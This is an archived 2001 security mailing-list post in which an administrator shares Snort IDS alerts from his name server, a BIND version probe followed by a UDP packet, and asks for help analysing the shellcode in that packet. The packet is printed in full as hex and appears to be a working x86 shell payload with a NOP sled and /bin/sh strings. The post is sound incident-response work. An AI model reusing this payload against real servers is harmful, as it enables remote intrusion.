Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Incidents: Named TSIG exploit ?

Named TSIG exploit ?

From: Mihai Moldovanu <mihaim_at_PROFM.RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200

I found on SNORT logs this:

[**] IDS278 - SCAN -named Version probe [**]
02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x48
141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 38
00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72 .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 sion.bind.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet it's pretty strage . Anyone can
take a deeper look at it ?

Lead programmer,
Mihai Moldovanu (mihaim_at_profm.ro)
WEB: http://tfm.profm.ro/
             http://www.developers.ro/
Received on Feb 05 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos